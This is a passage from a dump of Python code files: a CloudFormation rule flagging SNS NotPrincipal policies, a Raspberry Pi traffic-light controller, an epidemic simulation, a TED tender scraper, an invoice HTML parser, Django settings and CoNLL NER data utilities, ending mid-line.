def rule_id(self):\n '''\n Get rule id\n :return:\n '''\n if self.debug:\n print('rule_id' + lineno())\n self.id = 'F8'\n return 'F8'\n\n def audit_impl(self):\n '''\n Audit\n :return: violations\n '''\n if self.debug:\n print('SnsTopicPolicyNotPrincipalRule - audit_impl' + lineno())\n\n violating_policies = []\n resources = self.cfn_model.resources_by_type('AWS::SNS::TopicPolicy')\n\n if len(resources) > 0:\n for resource in resources:\n if self.debug:\n print('resource: ' + str(resource) + lineno())\n print('vars: ' + str(vars(resource)) + lineno())\n\n if hasattr(resource, 'policy_document'):\n\n if resource.policy_document:\n\n if resource.policy_document.allows_not_principal():\n violating_policies.append(str(resource.logical_resource_id))\n elif hasattr(resource, 'policy'):\n\n if resource.policy_document:\n\n if resource.policy.allows_not_principal():\n violating_policies.append(str(resource.logical_resource_id))\n\n else:\n if self.debug:\n print('no violating_policies' + lineno())\n\n\n\n return violating_policies","sub_path":"terraform_validator/custom_rules/SnsTopicPolicyNotPrincipalRule.py","file_name":"SnsTopicPolicyNotPrincipalRule.py","file_ext":"py","file_size_in_byte":2460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"46897006","text":"import RPi.GPIO as GPIO\nimport time\nimport sys\n\nRED = 22\nGREEN = 16\nYELLOW = 18\n\nSENSOR = 12\n\n\ndef all_leds_off():\n global RED, GREEN, YELLOW, SENSOR\n\n for pin in [RED, 
GREEN, YELLOW]:\n GPIO.output(pin, 0)\n\ndef signal_start():\n global RED, GREEN, YELLOW, SENSOR\n\n print(\"Starting signal\")\n all_leds_off()\n GPIO.output(GREEN, 1)\n\n\ndef signal_stop():\n global RED, GREEN, YELLOW, SENSOR\n\n print(\"Stopping signal\")\n all_leds_off()\n GPIO.output(YELLOW, 1)\n time.sleep(3)\n GPIO.output(YELLOW, 0)\n GPIO.output(RED, 1)\n\ndef setup():\n global RED, GREEN, YELLOW, SENSOR\n\n GPIO.cleanup()\n GPIO.setmode(GPIO.BOARD)\n\n GPIO.setup(RED, GPIO.OUT)\n GPIO.setup(GREEN, GPIO.OUT)\n GPIO.setup(YELLOW, GPIO.OUT)\n GPIO.setup(SENSOR, GPIO.IN)\n\nif '__main__' == __name__:\n \n \n setup()\n signal_stop()\n\n stopped = True\n\n while True:\n signal_status = GPIO.input(SENSOR)\n print(signal_status)\n if stopped and not signal_status:\n signal_start()\n stopped = False\n elif not stopped and signal_status:\n signal_stop()\n stopped = True\n \n time.sleep(0.5)\n","sub_path":"traffic_control.py","file_name":"traffic_control.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"263024726","text":"print(\"A Game of Hangman\")\n\n#random word generator\n\n#first method\n\nimport random\nlistA = [\"word1\", \"word2\", \"word3\"]\nMysteryWord = random.choice(listA)\nprint(MysteryWord)\n\n#second method\nstr='word1 word2 word3 word4'\nx=str.split()\ny=len(x)\nimport random\nz=random.randrange(-1,y)\nprint(x[z])\n\n\n#method 3\nprint(random.choice(\"word1 word2 word3 word4 word5 word6 word7\".split()))\n#less editing to do using this method and all in one line\n\n#use one of the above methods, but list is an import .txt file\n\nendseq = input(\"type exit to return to the index: \")\nif endseq == \"exit\":\n\texit()\nelse:\n\tprint(\"okay soooo....what now\")\n","sub_path":"sandboxes and beta/randomisation.py","file_name":"randomisation.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"69592916","text":"\"\"\"model change invites\n\nRevision ID: 534a8aa4ec83\nRevises: 070402407d93\nCreate Date: 2019-01-15 23:43:39.672053\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '534a8aa4ec83'\ndown_revision = '070402407d93'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('invites',\n sa.Column('ownerId', sa.Integer(), nullable=False),\n sa.Column('projectId', sa.Integer(), nullable=False),\n sa.Column('inviteeId', sa.Integer(), nullable=True),\n sa.Column('inviteStatus', sa.Boolean(), nullable=True),\n sa.Column('requestedTs', sa.DateTime(), nullable=True),\n sa.Column('responseTs', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['ownerId'], ['user.id'], ),\n sa.ForeignKeyConstraint(['projectId'], ['project.id'], ),\n sa.PrimaryKeyConstraint('ownerId', 'projectId')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_table('invites')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/534a8aa4ec83_model_change_invites.py","file_name":"534a8aa4ec83_model_change_invites.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"354829259","text":"import random\n\n# Defining classes-----------------------------------------------------------------------------------------------------------------------------------------\n# class Simulation\n# class Person\n# class Population\n\n\nclass Simulation():\n \"\"\"A class to control simulation\"\"\"\n\n def __init__(self):\n \"\"\"Initializing attributes\"\"\"\n self.day_number = 1\n self.population_size = int(\n input(\"To simulate an epidemic outbreak. Please enter the population size: \"))\n\n print(\"\\nFirst start by infecting a portion of the population.\")\n self.infection_percent = float(\n input(\"---Enter the percentage (0-100) of the population to initially infect: \"))\n self.infection_percent /= 100\n\n print(\"\\nKnowing the risk a person has to contract the disease when exposed.\")\n self.infection_probability = float(input(\n \"---Enter the probability (0-100) that a person gets infected when exposed to the disease: \"))\n\n print(\"\\nknowing how long the infection will last when exposed.\")\n self.infection_duration = int(\n input(\"---Enter the duration (in days) of the infection: \"))\n\n print(\"\\nknowing the mortality rate of those infected.\")\n self.mortality_rate = float(\n input(\"---Enter the mortality rate (0-100) of the infection: \"))\n\n print(\"\\nknowing how long to run the simulation.\")\n self.sim_days = int(input(\"---Enter the number of days to simulate: \"))\n\n\nclass Person():\n \"\"\"A class for the individual person\"\"\"\n\n def __init__(self):\n \"\"\"Initializing attributes\"\"\"\n self.is_infected = False\n self.is_dead = False\n self.days_infected = 0\n\n def infect(self, simulation):\n \"\"\"Infecting a person\"\"\"\n if random.randint(0, 100) < simulation.infection_probability:\n self.is_infected = True\n\n def heal(self):\n \"\"\"Heal a person\"\"\"\n self.is_infected = False\n self.days_infected = 0\n\n def die(self):\n \"\"\"Kill a person\"\"\"\n self.is_dead = True\n\n def update(self, simulation):\n \"\"\"update the simulation\"\"\"\n # check if a person is not dead.\n if not self.is_dead:\n # check if a person is infected\n if self.is_infected:\n self.days_infected += 1\n # check if a person will die or not\n if random.randint(0, 100) < simulation.mortality_rate:\n self.die()\n elif self.days_infected == simulation.infection_duration:\n self.heal()\n\n\nclass Population():\n \"\"\"A class to model a whole population of Person objects\"\"\"\n\n def __init__(self, simulation):\n \"\"\"Initializing attributes\"\"\"\n self.population = [] # list of all person instances\n\n for i in range(simulation.population_size): # loop through row\n person = Person()\n self.population.append(person)\n\n def initial_infection(self, Simulation):\n \"\"\"Infect an initial portion of the population based on initial conditions of the simulation\"\"\"\n infected_count = int(\n round(Simulation.infection_percent*Simulation.population_size, 0))\n\n for i in range(infected_count):\n self.population[i].is_infected = True\n self.population[i].days_infected = 1\n\n # shuffle the population to spred the infection\n random.shuffle(self.population)\n\n def spread_infection(self, simulation):\n \"\"\"Spreading the infection 
through adjacent neighbours in the population list\"\"\"\n        for i in range(len(self.population)):\n            if self.population[i].is_dead == False:\n                # if a person is not dead\n                if i == 0:\n                    # first person in list\n                    # check for right\n                    if self.population[i+1].is_infected:\n                        self.population[i].infect(simulation)\n                elif i < len(self.population)-1:\n                    # middle person in list\n                    # check for right and left\n                    if self.population[i-1].is_infected or self.population[i+1].is_infected:\n                        self.population[i].infect(simulation)\n                elif i == len(self.population)-1:\n                    # last person in a list\n                    # check for left\n                    if self.population[i-1].is_infected:\n                        self.population[i].infect(simulation)\n\n    def update(self, simulation):\n        \"\"\"Update the whole population by updating each individual Person\"\"\"\n        simulation.day_number += 1\n        for person in self.population:\n            person.update(simulation)\n\n    def display_statistics(self, simulation):\n        \"\"\"Display the statistics of the population\"\"\"\n        total_infected_count = 0\n        total_death_count = 0\n        for person in self.population:\n            # check if a person is infected or dead\n            if person.is_infected:\n                total_infected_count += 1\n            if person.is_dead:\n                total_death_count += 1\n\n        # Calculate percentage of population that is infected and dead\n        infected_percent = round(\n            100*(total_infected_count/simulation.population_size), 4)\n        death_percent = round(\n            100*(total_death_count/simulation.population_size), 4)\n\n        # Summary\n        print(f\"\\n-----Day #{simulation.day_number} -----\")\n        print(f\"Percentage of Population Infected: {infected_percent}%\")\n        print(f\"Percentage of Population Dead: {death_percent}%\")\n        print(\n            f\"Total People Infected: {total_infected_count} / {simulation.population_size}\")\n        print(\n            f\"Total Deaths: {total_death_count} / {simulation.population_size}\")\n\n    def graphics(self):\n        \"\"\"Graphical representation: 0 is healthy, I is infected, X is dead\"\"\"\n        status = []\n        for person in self.population:\n            # if person is dead\n            if person.is_dead:\n                char = \"X\"\n            else:\n                # person is alive\n                # if he/she is infected or healthy\n                if person.is_infected:\n                    char = \"I\"\n                else:\n                    char = \"0\"\n\n            status.append(char)\n\n        # print status separated by -\n        for letter in status:\n            print(letter, end=\"-\")\n\n# Defining classes end-------------------------------------------------------------------------------------------------------------------------------------\n# Defining functions------------------------------------------------------------------------------------------------------------------------------------\n\n\ndef main():\n    \"\"\"main code\"\"\"\n    # Epidemic Outbreak Terminal Application\n    print(\"**\"*50)\n\n    # Welcome message.\n    print(\"Welcome To Epidemic Outbreak Terminal Application.\")\n\n    # simulation object\n    sim = Simulation()\n\n    # A Population object.\n    pop = Population(sim)\n\n    # initializing\n    pop.initial_infection(sim)\n    pop.display_statistics(sim)\n    pop.graphics()\n    input(\"Press 'Enter' to start simulation\")\n\n    # Simulation\n    for i in range(1, sim.sim_days):\n        # Spread the infection\n        pop.spread_infection(sim)\n        # Update the population\n        pop.update(sim)\n        # Display the statistics\n        pop.display_statistics(sim)\n        pop.graphics()\n\n        # If we are currently not on the last day of the simulation:\n        if i != sim.sim_days-1:\n            input(\"\\nPress 'Enter' to advance to the next day.\")\n\n    # End of program.\n    print(\"\\n\\nThank you for using the Epidemic Outbreak Terminal Application. 
Goodbye.\\n\")\n    print(\"**\"*50)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"APPLICATIONS/8 Classes/39 Epidemic Outbreak Terminal Applicaton.py","file_name":"39 Epidemic Outbreak Terminal Applicaton.py","file_ext":"py","file_size_in_byte":7776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"354921836","text":"#!/usr/bin/env python\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport base64\nimport urllib.parse\nimport json\nimport argparse\nfrom datetime import date\nimport os\n\n\n#\n# CLI arguments setup\n#\nparser = argparse.ArgumentParser()\n\nparser.add_argument('--country', '-c', help = 'Set country code, two letters in caps, default is SE', type = str, default = \"SE\")\nparser.add_argument('--limit', '-l', help = 'Limit results to, default is 20', type = int, default = 20)\nparser.add_argument('--page', '-p', help = 'Page number to fetch, default is 1', type = int, default = 1)\nparser.add_argument('--search', '-t', help = 'Search string', type = str )\nparser.add_argument('--date', '-d', help = 'Date to search (YYYYMMDD or a span YYYYMMDD-YYYYMMDD)', type = str )\nparser.add_argument('--savexml', help = 'Save results as XML-files', type = str )\nparser.add_argument('--savejson', help = 'Save results as JSON-file', type = str )\nparser.add_argument('--json', help = 'Return as json', action='store_true' )\nparser.add_argument('--debug', help = 'Prints out debug information', action='store_true' )\n\n# Save all arguments here\nargs = parser.parse_args()\n\n\ndef fetchFromApi():\n\n    # Start building a query\n    qs = []\n\n    # Set country parameter\n    if args.country:\n        qs.append(\"CY=[\" + str(args.country) +\"]\")\n\n    # Set date parameter\n    if args.date:\n        date = args.date.split('-')\n        if len(date) == 2:\n            qs.append(\"PD=[\" + str(date[0]).strip() + \" <> \" + str(date[1]).strip() +\"]\")\n        else:\n            qs.append(\"PD=[\" + str(date[0]).strip() +\"]\")\n        \n    ## Set search string\n    if args.search:\n        searchList = []\n        for w in args.search.split(\",\"):\n            searchList.append('FT=[' + w + ']')\n        search = \" AND \".join(searchList)\n        qs.append('(' + search + ')' )\n\n    # Parse query string\n    apiQuery = urllib.parse.quote( \" AND \".join(qs) )\n    debug(\" AND \".join(qs), 'query')\n\n    # Generate request URI\n    apiUrl = 'https://ted.europa.eu/api/v2.0/notices/search?fields=CONTENT&pageNum=%d&pageSize=%d&q=%s&reverseOrder=false&scope=2&sortField=ND' % (args.page, args.limit, apiQuery)\n    debug(apiUrl, 'request url')\n\n    # Get the response\n    req = requests.get(apiUrl)\n    req_json = req.json()\n    debug(req_json, 'json response')\n\n    # New dict to save results in\n    results = {\n        \"total\": req_json['total'],\n        \"current_count\": len(req_json['results']),\n        \"current_page\": args.page,\n        \"results\": [],\n    }\n\n    # Loop over results\n    for c in req_json['results']:\n        results['results'].append( readContent( c['content'] ) )\n\n    # Save to json file\n    if args.savejson:\n        # Get current dir, create and save output file\n        filename = os.path.dirname(os.path.abspath(__file__)) + '/' + str(args.savejson)\n        f = open(filename,\"w+\")\n        f.write(json.dumps(results))\n        f.close()\n\n    # Output json\n    if args.json:\n        print( json.dumps(results) )\n    \n    # Print results\n    else:\n        print('-------------------------------------------------------------------')\n        print('')\n        print(' Showing '+ str(len(req_json['results'])) + ' of ' + str(req_json['total']) + ' found notices.')\n        print('')\n        
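# plain-text listing of each notice (skipped when --json output is requested)\n        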
print('-------------------------------------------------------------------')\n print('')\n print('')\n\n # Loop over results again.\n # TODO: Dry?\n for doc in results['results']:\n print(doc['name'] + ' / ' + doc['city'] + ' / ' + doc['docId'] )\n print(doc['title'])\n print(doc['desc'])\n print(doc['applyurl'])\n print('')\n print('-------------------------------------------------------------------')\n print('')\n\n\n\n\n\ndef readContent(content):\n # Base64 decode to xml string\n xml = base64.b64decode(content)\n\n # Parse with BeautifulSoup\n doc = BeautifulSoup(xml, \"xml\")\n\n # Extract the data we want here\n ted = extractJSON(doc)\n\n\n if args.savexml:\n # Get current dir, create output dir and save file\n path = os.path.dirname(os.path.abspath(__file__)) + '/' + str(args.savexml)\n os.makedirs(path, exist_ok=True)\n filename = path + '/' + ted['docId'] + '.xml'\n f = open(filename,\"w+\")\n f.write(doc.prettify())\n f.close()\n\n return ted\n\n\ndef extractJSON(doc):\n ted = {}\n \n # Find ORG information\n org_details = doc.find('CONTRACTING_BODY')\n if org_details:\n ted['org_details'] = {\n \"name\": findOrFalse( org_details.find('OFFICIALNAME') ),\n \"city\": findOrFalse( org_details.find('TOWN') ),\n \"street\": findOrFalse( org_details.find('ADDRESS') ),\n \"contact_name\": findOrFalse( org_details.find('CONTACT_POINT') ),\n \"contact_email\": findOrFalse( org_details.find('E_MAIL') ),\n \"url\": findOrFalse( org_details.find('URL_GENERAL') ) or findOrFalse( doc.find('NOTICE_DATA').find('IA_URL_GENERAL'))\n }\n \n # ted['primary_cpv'] = ''\n ted['cpv'] = {}\n for cpv in doc.find_all('ORIGINAL_CPV'):\n ted['cpv'][cpv['CODE']] = cpv.get_text()\n\n ted['nuts'] = findOrFalse( doc.find('NUTS'), 'CODE' ) or \"\"\n ted['city'] = findOrFalse( doc.find('TOWN') ) or \"\"\n ted['title'] = findOrFalse( doc.find('TITLE') ) or \"\"\n ted['desc'] = findOrFalse( doc.find('SHORT_DESCR') ) or \"\"\n ted['docId'] = findOrFalse( doc.find('TED_EXPORT'), 'DOC_ID' ) or \"\" \n ted['date_expires'] = findOrFalse( doc.find('DELETION_DATE') ) or \"\" \n ted['date_submitby'] = findOrFalse( doc.find('DATE_RECEIPT_TENDERS') ) or \"\" \n ted['applyurl'] = findOrFalse( doc.find('URL_DOCUMENT') ) or \"\"\n\n # Because chaining find() can cause errors\n contracting_body = doc.find('CONTRACTING_BODY')\n if contracting_body: \n ted['name'] = findOrFalse( contracting_body.find('OFFICIALNAME') ) or \"\"\n else:\n ted['name'] = \"\"\n\n # Because chaining find() can cause errors\n coded_data_section = doc.find('CODED_DATA_SECTION')\n if coded_data_section: \n ted['date_added'] = findOrFalse( coded_data_section.find('DATE_PUB') ) or \"\"\n else:\n ted['date_added'] = \"\"\n\n return ted\n\ndef findOrFalse(el, attr = False):\n if el and attr == False:\n return el.get_text().strip()\n elif el and attr:\n return el[attr]\n else:\n return False\n\ndef debug(data, flag = \"\"):\n if args.debug:\n print( '[' + flag + ']' )\n print( repr(data) )\n print( '[/' + flag + ']' )\n\nfetchFromApi()","sub_path":"ted.py","file_name":"ted.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"449092128","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = [[]]\n self.dfs(nums, 0, [], res)\n return res\n \n def dfs(self, nums, start, cur, res):\n if start >= len(nums):\n return\n else:\n for i in range(start, len(nums)):\n cur.append(nums[i])\n res.append(cur[:])\n self.dfs(nums, i + 1, cur, res)\n 
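# backtrack: remove nums[i] so the next candidate starts from the shorter prefix\n                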
cur.pop()\n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n subsets = [[]]\n for num in nums:\n for i in range(len(subsets)):\n subsets.append(subsets[i] + [num])\n return subsets \n\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n res = []\n self.dfs(nums, [], 0, res)\n return res\n \n def dfs(self, nums, cur, index, res):\n if index == len(nums):\n res.append(cur[:])\n else:\n self.dfs(nums, cur, index + 1, res)\n \n cur.append(nums[index])\n self.dfs(nums, cur, index + 1, res)\n cur.pop()\n\n","sub_path":"leetcode-questions/Tree/DFS&Backtracking/78_subsets.py","file_name":"78_subsets.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"541297613","text":"# encoding:utf-8\nimport json\nimport re\nfrom collections import OrderedDict\n\nimport os\nfrom bs4 import BeautifulSoup\n\n\ndef parse_source_code(source_html, invoice_id):\n soup = BeautifulSoup(source_html, 'lxml')\n\n fp_dict = OrderedDict()\n\n fp_dict['发票代码'] = soup.find('span', attrs={'id': re.compile('fpdm_(\\w+)')}).get_text()\n fp_dict['发票号码'] = soup.find('span', attrs={'id': re.compile('fphm_(\\w+)')}).get_text()\n fp_dict['开票日期'] = soup.find('span', attrs={'id': re.compile('kprq_(\\w+)')}).get_text()\n fp_dict['校验码'] = soup.find('span', attrs={'id': re.compile('jym_(\\w+)')}).get_text()\n fp_dict['机器编号'] = soup.find('span', attrs={'id': re.compile('[(sb)|(jq)]bh_(\\w+)')}).get_text()\n\n fp_dict['购买方名称'] = soup.find('span', attrs={'id': re.compile('gfmc_(\\w+)')}).get_text()\n fp_dict['购买方纳税人识别号'] = soup.find('span', attrs={'id': re.compile('gfsbh_(\\w+)')}).get_text()\n fp_dict['购买方地址、电话'] = soup.find('span', attrs={'id': re.compile('gfdzdh_(\\w+)')}).get_text()\n fp_dict['购买方开户行及账号'] = soup.find('span', attrs={'id': re.compile('gfyhzh_(\\w+)')}).get_text()\n\n fpmx_dict = OrderedDict()\n fpmx_items = []\n\n mx_table = soup.find('button', id='showmx')\n if mx_table:\n mx_row = soup.find('div', attrs={'id': 'print_areamx'}).find('table', class_='fppy_table').find_all('tr')\n else:\n mx_row = soup.find('table', attrs={'class': 'fppy_table_box'}).find_all('tr')\n\n for idx, row in enumerate(mx_row[1:]):\n temp_item = OrderedDict()\n\n if row.find('td').get_text().strip() == '合计' or row.find('td').get_text().strip() == '小计':\n break\n\n line_item = row.find_all('td')\n item_cnt = len(line_item)\n\n temp_item['序号'] = str(idx + 1)\n temp_item['货物或应税劳务、服务名称'] = line_item[item_cnt-8].get_text()\n temp_item['规格型号'] = line_item[item_cnt-7].get_text()\n temp_item['单位'] = line_item[item_cnt-6].get_text()\n temp_item['数量'] = line_item[item_cnt-5].get_text()\n temp_item['单价'] = line_item[item_cnt-4].get_text()\n temp_item['金额'] = line_item[item_cnt-3].get_text()\n temp_item['税率'] = line_item[item_cnt-2].get_text()\n temp_item['税额'] = line_item[item_cnt-1].get_text()\n fpmx_items.append(temp_item)\n fpmx_dict['项目'] = fpmx_items\n fpmx_dict['合计金额'] = soup.find('span', id=re.compile('je_(\\w+)')).get_text()\n fpmx_dict['合计税额'] = soup.find('span', id=re.compile('se_(\\w+)')).get_text()\n fpmx_dict['合计税额'] = soup.find('span', id=re.compile('se_(\\w+)')).get_text()\n fpmx_dict['价税合计(大写)'] = soup.find('span', id=re.compile('jshjdx_(\\w+)')).get_text()\n fpmx_dict['价税合计(小写)'] = soup.find('span', id=re.compile('jshjxx_(\\w+)')).get_text()\n\n fp_dict['明细'] = fpmx_dict\n\n fp_dict['销售方名称'] = soup.find('span', attrs={'id': re.compile('xfmc_(\\w+)')}).get_text()\n fp_dict['销售方纳税人识别号'] = 
soup.find('span', attrs={'id': re.compile('xfsbh_(\\w+)')}).get_text()\n fp_dict['销售方地址、电话'] = soup.find('span', attrs={'id': re.compile('xfdzdh_(\\w+)')}).get_text()\n fp_dict['销售方开户行及账号'] = soup.find('span', attrs={'id': re.compile('xfyhzh_(\\w+)')}).get_text()\n\n fp_dict['备注'] = soup.find('td', attrs={'id': re.compile('bz_(\\w+)')}).get_text().replace('\\n', '').strip()\n\n if 'display: none' in soup.find('div', attrs={'id': 'icon_zf'})['style']:\n fp_dict['发票状态'] = '正常'\n else:\n fp_dict['发票状态'] = '作废'\n\n json_text = json.dumps(fp_dict, ensure_ascii=False)\n\n with open(os.path.join('temp', '%s.json' % invoice_id), 'w', encoding='utf-8') as f:\n f.write(json_text)\n\n\nif __name__ == '__main__':\n with open('24695838.html', 'r') as f:\n parse_source_code(f.read(), '24695838')\n","sub_path":"invoice-validation/sourceparser.py","file_name":"sourceparser.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"564900426","text":"\"\"\"\nDjango settings for mysite3 project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nfrom mysite3.base import *\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.environ['SECRET_KEY']\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = not True\n\nTEMPLATE_DEBUG = DEBUG\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': 'mysite3_db',\n 'USER': 'mysite3_user',\n 'PASSWORD': 'mysite3_pass',\n 'HOST': 'localhost',\n }\n}\n\nSESSION_COOKIE_SECURE = True\n\nAUTHENTICATION_BACKENDS = (\n 'social.backends.google.GoogleOAuth2',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'social.apps.django_app.context_processors.backends',\n 'social.apps.django_app.context_processors.login_redirect',\n)\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = os.environ['SOCIAL_AUTH_GOOGLE_OAUTH2_KEY']\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = os.environ[\n 'SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET'\n]\n\nTEST_RUNNER = None\nNOSE_ARGS = None\n","sub_path":"mysite3/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"397165123","text":"# Copyright 2018 The Texar Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Utilities for preprocessing and iterating over the CoNLL 2003 data.\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n# pylint: disable=invalid-name, too-many-locals\nimport sys\nfrom collections import defaultdict\nimport numpy as np\n\n\nimport re\nMAX_CHAR_LENGTH = 45\nNUM_CHAR_PAD = 2\n\nUNK_WORD, UNK_CHAR, UNK_NER = 0, 0, 0\nPAD_WORD, PAD_CHAR, PAD_NER = 1, 1, 1\n\n\n# Regular expressions used to normalize digits.\nDIGIT_RE = re.compile(br\"\\d\")\n\ndef create_vocabs(train_path, normalize_digits=True):\n\n word_vocab = defaultdict(lambda: len(word_vocab))\n char_vocab = defaultdict(lambda: len(char_vocab))\n ner_vocab = defaultdict(lambda: len(ner_vocab))\n\n UNK_WORD = word_vocab[\"\"]\n PAD_WORD = word_vocab[\"\"]\n UNK_CHAR = char_vocab[\"\"]\n PAD_CHAR = char_vocab[\"\"]\n UNK_NER = ner_vocab[\"\"]\n PAD_NER = ner_vocab[\"\"]\n\n\n print(\"Creating Vocabularies:\")\n\n with open(train_path, 'r') as file:\n for line in file:\n if sys.version[0] =='2':\n line = line.decode('utf-8')\n line = line.strip()\n if len(line) == 0:\n continue\n\n tokens = line.split(' ')\n for char in tokens[1]:\n cid = char_vocab[char]\n\n word = DIGIT_RE.sub(b\"0\", tokens[1]) if normalize_digits else tokens[1]\n ner = tokens[4]\n\n wid = word_vocab[word]\n nid = ner_vocab[ner]\n\n\n print(\"Total Vocabulary Size: %d\" % len(word_vocab))\n print(\"Character Alphabet Size: %d\" % len(char_vocab))\n print(\"NER Alphabet Size: %d\" % len(ner_vocab))\n\n word_vocab = defaultdict(lambda: UNK_WORD, word_vocab)\n char_vocab = defaultdict(lambda: UNK_CHAR, char_vocab)\n ner_vocab = defaultdict(lambda: UNK_NER, ner_vocab)\n\n i2w = {v: k for k, v in word_vocab.items()}\n i2n = {v: k for k, v in ner_vocab.items()}\n return (word_vocab, char_vocab, ner_vocab), (i2w, i2n)\n\n\ndef read_data(source_path, word_vocab, char_vocab, ner_vocab, normalize_digits=True):\n data = []\n print('Reading data from %s' % source_path)\n counter = 0\n reader = CoNLLReader(source_path, word_vocab, char_vocab, ner_vocab)\n inst = reader.getNext(normalize_digits)\n while inst is not None:\n counter += 1\n sent = inst.sentence\n data.append([sent.word_ids, sent.char_id_seqs, inst.ner_ids])\n inst = reader.getNext(normalize_digits)\n\n reader.close()\n print(\"Total number of data: %d\" % counter)\n return data\n\n\ndef iterate_batch(data, batch_size, shuffle=False):\n if shuffle:\n np.random.shuffle(data)\n\n for start_idx in range(0, len(data), batch_size):\n excerpt = slice(start_idx, start_idx + batch_size)\n batch = data[excerpt]\n\n batch_length = max([len(batch[i][0]) for i in range(len(batch))])\n\n wid_inputs = np.empty([len(batch), batch_length], dtype=np.int64)\n cid_inputs = np.empty([len(batch), batch_length, MAX_CHAR_LENGTH], dtype=np.int64)\n nid_inputs = np.empty([len(batch), batch_length], dtype=np.int64)\n masks = np.zeros([len(batch), batch_length], dtype=np.float32)\n 
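# true (unpadded) sequence length of each example, filled in per instance below\n        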
lengths = np.empty(len(batch), dtype=np.int64)\n\n for i, inst in enumerate(batch):\n wids, cid_seqs, nids = inst\n\n inst_size = len(wids)\n lengths[i] = inst_size\n # word ids\n wid_inputs[i, :inst_size] = wids\n wid_inputs[i, inst_size:] = PAD_WORD\n for c, cids in enumerate(cid_seqs):\n cid_inputs[i, c, :len(cids)] = cids\n cid_inputs[i, c, len(cids):] = PAD_CHAR\n cid_inputs[i, inst_size:, :] = PAD_CHAR\n nid_inputs[i, :inst_size] = nids\n nid_inputs[i, inst_size:] = PAD_NER\n masks[i, :inst_size] = 1.0\n\n yield wid_inputs, cid_inputs, nid_inputs, masks, lengths\n\n\nclass CoNLLReader(object):\n def __init__(self, file_path, word_vocab, char_vocab, ner_vocab):\n self.__source_file = open(file_path, 'r')\n self.__word_vocab = word_vocab\n self.__char_vocab = char_vocab\n self.__ner_vocab = ner_vocab\n\n def close(self):\n self.__source_file.close()\n\n def getNext(self, normalize_digits=True):\n line = self.__source_file.readline()\n # skip multiple blank lines.\n while len(line) > 0 and len(line.strip()) == 0:\n line = self.__source_file.readline()\n if len(line) == 0:\n return None\n\n lines = []\n while len(line.strip()) > 0:\n line = line.strip()\n line = line.decode('utf-8')\n lines.append(line.split(' '))\n line = self.__source_file.readline()\n\n length = len(lines)\n if length == 0:\n return None\n\n words = []\n word_ids = []\n char_seqs = []\n char_id_seqs = []\n ner_tags = []\n ner_ids = []\n\n for tokens in lines:\n chars = []\n char_ids = []\n for char in tokens[1]:\n chars.append(char)\n char_ids.append(self.__char_vocab[char])\n if len(chars) > MAX_CHAR_LENGTH:\n chars = chars[:MAX_CHAR_LENGTH]\n char_ids = char_ids[:MAX_CHAR_LENGTH]\n char_seqs.append(chars)\n char_id_seqs.append(char_ids)\n\n word = DIGIT_RE.sub(b\"0\", tokens[1]) if normalize_digits else tokens[1]\n ner = tokens[4]\n\n words.append(word)\n word_ids.append(self.__word_vocab[word])\n\n ner_tags.append(ner)\n ner_ids.append(self.__ner_vocab[ner])\n\n return NERInstance(Sentence(words, word_ids, char_seqs, char_id_seqs), ner_tags, 